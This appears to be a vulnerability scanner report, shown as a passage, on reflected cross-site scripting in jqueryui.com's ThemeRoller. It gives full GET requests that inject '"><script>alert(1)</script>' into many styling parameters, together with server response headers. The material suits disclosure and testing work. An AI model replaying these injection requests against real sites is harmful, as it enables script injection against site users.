HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09db"><script>alert(1)</script>f9cc1bf1ccd was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5f09db"><script>alert(1)</script>f9cc1bf1ccd&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91800"><script>alert(1)</script>56b1ce80b05 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa91800"><script>alert(1)</script>56b1ce80b05&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab3"><script>alert(1)</script>a1bd18e5f3c was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa86ab3"><script>alert(1)</script>a1bd18e5f3c&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8ff"><script>alert(1)</script>4dac13d937a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=1005c8ff"><script>alert(1)</script>4dac13d937a&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48783"><script>alert(1)</script>fd12b7de828 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10048783"><script>alert(1)</script>fd12b7de828&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8d3"><script>alert(1)</script>73a17b4b229 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=857c8d3"><script>alert(1)</script>73a17b4b229&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab58a"><script>alert(1)</script>669106d826b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95ab58a"><script>alert(1)</script>669106d826b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca687"><script>alert(1)</script>6a780e1b0e0 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55ca687"><script>alert(1)</script>6a780e1b0e0&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba09"><script>alert(1)</script>1615e2d69db was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=559ba09"><script>alert(1)</script>1615e2d69db&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c945"><script>alert(1)</script>d5c19407d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=751c945"><script>alert(1)</script>d5c19407d7&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c64ac"><script>alert(1)</script>9179f8285de was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0c64ac"><script>alert(1)</script>9179f8285de&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d0d"><script>alert(1)</script>32e75550ce7 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0c9d0d"><script>alert(1)</script>32e75550ce7&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e7a"><script>alert(1)</script>363200d54d4 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
